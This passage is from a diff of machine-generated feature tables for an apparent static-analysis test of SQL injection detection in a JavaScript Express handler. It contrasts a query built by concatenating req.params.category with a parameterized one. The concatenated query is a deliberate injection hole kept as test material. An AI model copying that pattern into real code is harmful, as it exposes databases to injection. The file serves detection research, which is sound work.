| contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:20:8:25 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:20:8:25 | params | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:20:8:25 | params | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:20:8:25 | params | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:27:8:34 | category | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:27:8:34 | category | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:27:8:34 | category | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:27:8:34 | category | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:27:8:34 | category | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:38:8:55 | "' ORDER BY PRICE" | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:38:8:55 | "' ORDER BY PRICE" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:38:8:55 | "' ORDER BY PRICE" | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:38:8:55 | "' ORDER BY PRICE" | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:38:8:55 | "' ORDER BY PRICE" | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:8:38:8:55 | "' ORDER BY PRICE" | stringConcatenatedWith | 'SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='' + req.params.category -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:9:6 | pool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:9:6 | pool | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:9:6 | pool | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:9:6 | pool | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:9:6 | pool | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:9:12 | pool.query | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:9:12 | pool.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:9:12 | pool.query | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:9:12 | pool.query | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:9:12 | pool.query | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:11:4 | exceptional return of pool.qu ... ts\\n }) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:11:4 | exceptional return of pool.qu ... ts\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:11:4 | exceptional return of pool.qu ... ts\\n }) | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:11:4 | exceptional return of pool.qu ... ts\\n }) | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:11:4 | exceptional return of pool.qu ... ts\\n }) | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:11:4 | pool.qu ... ts\\n }) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:11:4 | pool.qu ... ts\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:11:4 | pool.qu ... ts\\n }) | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:11:4 | pool.qu ... ts\\n }) | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:3:11:4 | pool.qu ... ts\\n }) | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:8:9:12 | query | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:8:9:12 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:8:9:12 | query | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:8:9:12 | query | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:8:9:12 | query | fileImports | express pg | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:14:9:19 | query1 | CalleeFlexibleAccessPath | pool.query | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:14:9:19 | query1 | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:14:9:19 | query1 | calleeImports | pg | @@ -4441,6 +21413,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:22:9:23 | [] | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:22:9:23 | [] | fileImports | express pg | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:22:9:23 | [] | receiverName | pool | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:9:25 | this | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:9:25 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:9:25 | this | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:9:25 | this | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:9:25 | this | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | 'arguments' object of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | 'arguments' object of anonymous function | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | exceptional return of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | exceptional return of anonymous function | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | exceptional return of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | exceptional return of anonymous function | fileImports | express pg | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | functio ... lts\\n } | CalleeFlexibleAccessPath | pool.query | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | functio ... lts\\n } | InputArgumentIndex | 2 | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | functio ... lts\\n } | calleeImports | pg | @@ -4450,11 +21437,78 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | functio ... lts\\n } | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | functio ... lts\\n } | fileImports | express pg | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | functio ... lts\\n } | receiverName | pool | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | return of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | return of anonymous function | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | return of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:26:11:3 | return of anonymous function | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:35:9:37 | err | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:35:9:37 | err | contextSurroundingFunctionParameters | (req, res)\n(err, results) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:35:9:37 | err | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:35:9:37 | err | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:35:9:37 | err | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:40:9:46 | results | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:40:9:46 | results | contextSurroundingFunctionParameters | (req, res)\n(err, results) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:40:9:46 | results | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:40:9:46 | results | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:9:40:9:46 | results | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:7:14:12 | query2 | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:7:14:12 | query2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:7:14:12 | query2 | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:7:14:12 | query2 | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:7:14:12 | query2 | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:7:15:32 | query2 | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:7:15:32 | query2 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:7:15:32 | query2 | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:7:15:32 | query2 | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:7:15:32 | query2 | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:7:15:32 | query2 ... PRICE" | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:7:15:32 | query2 ... PRICE" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:7:15:32 | query2 ... PRICE" | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:7:15:32 | query2 ... PRICE" | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:7:15:32 | query2 ... PRICE" | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:16:14:70 | "SELECT ... ORY=$1" | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:16:14:70 | "SELECT ... ORY=$1" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:16:14:70 | "SELECT ... ORY=$1" | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:16:14:70 | "SELECT ... ORY=$1" | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:16:14:70 | "SELECT ... ORY=$1" | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:16:14:70 | "SELECT ... ORY=$1" | stringConcatenatedWith | -endpoint- ' ORDER BY PRICE' | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:16:15:32 | "SELECT ... PRICE" | contextFunctionInterfaces | handler(req, res) | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:16:15:32 | "SELECT ... PRICE" | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:16:15:32 | "SELECT ... PRICE" | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:16:15:32 | "SELECT ... PRICE" | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:14:16:15:32 | "SELECT ... PRICE" | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:15:16:15:32 | " ORDER BY PRICE" | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:15:16:15:32 | " ORDER BY PRICE" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:15:16:15:32 | " ORDER BY PRICE" | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:15:16:15:32 | " ORDER BY PRICE" | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:15:16:15:32 | " ORDER BY PRICE" | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:15:16:15:32 | " ORDER BY PRICE" | stringConcatenatedWith | 'SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1' -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:16:6 | pool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:16:6 | pool | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:16:6 | pool | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:16:6 | pool | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:16:6 | pool | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:16:12 | pool.query | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:16:12 | pool.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:16:12 | pool.query | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:16:12 | pool.query | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:16:12 | pool.query | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:18:4 | exceptional return of pool.qu ... ts\\n }) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:18:4 | exceptional return of pool.qu ... ts\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:18:4 | exceptional return of pool.qu ... ts\\n }) | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:18:4 | exceptional return of pool.qu ... ts\\n }) | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:18:4 | exceptional return of pool.qu ... ts\\n }) | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:18:4 | pool.qu ... ts\\n }) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:18:4 | pool.qu ... ts\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:18:4 | pool.qu ... ts\\n }) | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:18:4 | pool.qu ... ts\\n }) | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:3:18:4 | pool.qu ... ts\\n }) | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:8:16:12 | query | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:8:16:12 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:8:16:12 | query | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:8:16:12 | query | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:8:16:12 | query | fileImports | express pg | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:14:16:19 | query2 | CalleeFlexibleAccessPath | pool.query | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:14:16:19 | query2 | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:14:16:19 | query2 | calleeImports | pg | @@ -4473,11 +21527,51 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:22:16:42 | [req.pa ... tegory] | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:22:16:42 | [req.pa ... tegory] | fileImports | express pg | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:22:16:42 | [req.pa ... tegory] | receiverName | pool | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:25 | req | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:25 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:25 | req | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:25 | req | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:25 | req | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:32 | req.params | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:32 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:32 | req.params | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:32 | req.params | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:32 | req.params | fileImports | express pg | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:41 | req.params.category | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:41 | req.params.category | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:41 | req.params.category | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:41 | req.params.category | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:41 | req.params.category | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:41 | req.params.category | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:41 | req.params.category | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:41 | req.params.category | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:41 | req.params.category | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:41 | req.params.category | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:27:16:32 | params | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:27:16:32 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:27:16:32 | params | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:27:16:32 | params | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:27:16:32 | params | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:34:16:41 | category | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:34:16:41 | category | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:34:16:41 | category | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM 